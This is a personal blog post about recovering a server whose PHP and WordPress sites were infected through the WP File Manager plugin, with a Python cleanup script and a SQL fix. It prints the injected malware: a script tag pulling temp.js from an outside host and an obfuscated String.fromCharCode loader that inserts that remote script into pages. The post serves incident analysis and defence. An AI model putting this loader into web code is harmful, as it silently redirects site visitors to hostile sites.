WordPress Hacked

WordPress Hacked – Redirects to a different URL?

My server got hacked!?!

On 5th September 2020, my server got hacked. I didn’t know what was happening. All the PHP applications on one of my servers were redirecting to this strange URL: https://temp.lowerbeforwarden.ml/ which would in turn redirect to strange ad sites.

I was notified by one of my clients that she was getting a strange captcha verification for the site, and as far as I knew I didn’t have anything like that.

I checked the site myself to find it was redirecting to random sites.

I first checked my server to see if I still had access. To my relief, I did.

I checked the contents of the folders and they were still present. Another sigh of relief.

However, I still didn’t know what was happening.

The first thing that came to mind was an XSS vulnerability or SQL injection on one of the sites, as it was a JavaScript redirect.

I ran a curl on the page and I could see a random script at the top of the page:

<script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script>

I went to check the other sites and all the sites on that server were redirecting.

Luckily, one of the projects on the server was running through a Git repo. I ran git status to find the changes.

More than 1000 changes to different files.

On closer inspection, they were mostly index*.*, *.tpl and .js files. That is strange, I thought.

I looked at the changes in the files and I could find a few:

First:

All index files had the following script:

<script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'>

All files with a .js extension had:

Element.prototype.appendAfter = function(element) {
    element.parentNode.insertBefore(this, element.nextSibling);
}, false;
(function() {
    // every string is hidden behind String.fromCharCode; the decoded values are shown in the comments
    var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); // "script"
    elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); // "text/javascript"
    elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115); // "https://temp.lowerbeforwarden.ml/temp.js"
    elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]); // after the first <script>
    elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]); // after <head>
    document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem); // inside <head>
})();

I got an idea of what was happening. I logged into the server and tried to search for all the files containing the above keywords.

More than 10000 files had been infected. I knew I had to remove these, but how? I wondered for a while.

Then I opened the folder with VS Code and searched for the keyword. I could actually find these pesky script tags and I ran a quick find and replace on them.
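A scripted version of that find-and-replace step, as an added example that is not from the original post: it matches the two injection forms quoted above (the <script> tag, in any attribute order and with any ?n= value, and the String.fromCharCode loader prepended to .js files), decodes the obfuscated strings so they can be read, and reports or cleans a web root. The sample inputs are constructed, and the list of file extensions is an assumption.

```python
import re
from pathlib import Path

# Both injection forms quoted in the post share this hostname fragment.
MARKER = "lowerbeforwarden"
# Form 1: a <script ...lowerbeforwarden...> tag, with or without its closing tag.
# [^>]* cannot cross a '>', so only the tag's own attributes are inspected.
SCRIPT_TAG_RE = re.compile(r"<script[^>]*lowerbeforwarden[^>]*>(\s*</script>)?", re.IGNORECASE)
# Form 2: the loader starts with the appendAfter shim and ends with the self-invoking "})();".
JS_LOADER_RE = re.compile(r"Element\.prototype\.appendAfter\s*=.*?\}\)\(\);", re.DOTALL)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")

def decode_fromcharcode(js):
    """Return the plain strings hidden behind every String.fromCharCode(...) call."""
    return ["".join(chr(int(n)) for n in m.group(1).split(","))
            for m in FROMCHARCODE_RE.finditer(js)]

def clean_text(text):
    """Strip both injection forms. Returns (cleaned_text, number_of_removals)."""
    text, n_tags = SCRIPT_TAG_RE.subn("", text)
    text, n_loaders = JS_LOADER_RE.subn("", text)
    return text, n_tags + n_loaders

def scan_tree(root, fix=False, exts=(".php", ".html", ".htm", ".tpl", ".js")):
    """Walk a web root and return {path: removals}; with fix=True rewrite the files.
    Run with fix=False first and review the report before changing anything."""
    report = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in exts:
            continue
        raw = path.read_text(encoding="utf-8", errors="surrogateescape")
        if MARKER not in raw and "Element.prototype.appendAfter" not in raw:
            continue  # cheap pre-check before running the regexes
        cleaned, hits = clean_text(raw)
        if hits:
            report[str(path)] = hits
            if fix:
                path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
    return report

# Constructed samples reproducing the two forms quoted in the post.
INFECTED_INDEX = ("<html><head><script type='text/javascript' "
                  "src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script>"
                  "<title>Site</title></head></html>")
INFECTED_JS = ("Element.prototype.appendAfter = function(element) {element.parentNode."
               "insertBefore(this, element.nextSibling);}, false;(function() { var elem = "
               "document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.src = "
               "String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,"
               "101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,"
               "46,106,115);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]"
               ".appendChild(elem);})();\nfunction legit() { return 1; }\n")
```

Calling scan_tree("/var/www", fix=False) lists every infected file with its hit count; the same call with fix=True rewrites them in place, so take a copy of the web root first.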

TADA!!!! The scripts had been removed. My PHP applications started running fine without redirection. However, all the WordPress sites were still redirecting.

I was confused at first. I ran a quick ClamAV scan to find the malicious PHP file. It was one of the plugins I used:

WP-FILE MANAGER!!!!!

If anyone needs that file, please comment below and I might add it somewhere.

TLDR;

The script ran through all the files on the server. ALL THE FILES!!

And added those pesky JavaScripts.

It also went through the WP file to find the WP database details, logged into the DB server and modified all tables that had the POSTS keyword.

Mainly the wp_posts table!

I looked in the database to find more than 9000 affected rows in one of the clients’ DBs.

At first I thought of restoring from the backup. However, I didn’t have the latest one. I usually back up every week! Shame on me, I thought.

I then looked into reverse engineering this code.

I could see what it did to the database, so I just made a quick update script:

UPDATE wp_posts
SET 
    post_content = REPLACE(post_content,
        "<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>",
        '')
WHERE
    post_content LIKE '%lowerbeforwarden%';

VOILA!!

That modified all the post records and removed the JavaScript code.

However, on refreshing the page, it was still redirecting!!!

I had a look at the page again with a curl command. I could see this JS being generated in the HTML file. Strange, I thought. I re-searched the folder and I couldn’t find any mentions.

Then I realised I had different cache plugins, but I couldn’t disable them as I couldn’t log in yet.

I just deleted the cache folder inside wp-content and cleared the browser cache.

The site was up and running!

A few things I learned the hard way:

  1. One user per site so that if one site is hacked, it doesn’t affect the other owners.
  2. Backup! And backup frequently!
  3. Remove plugins that are not required anymore.

Hope this helps!
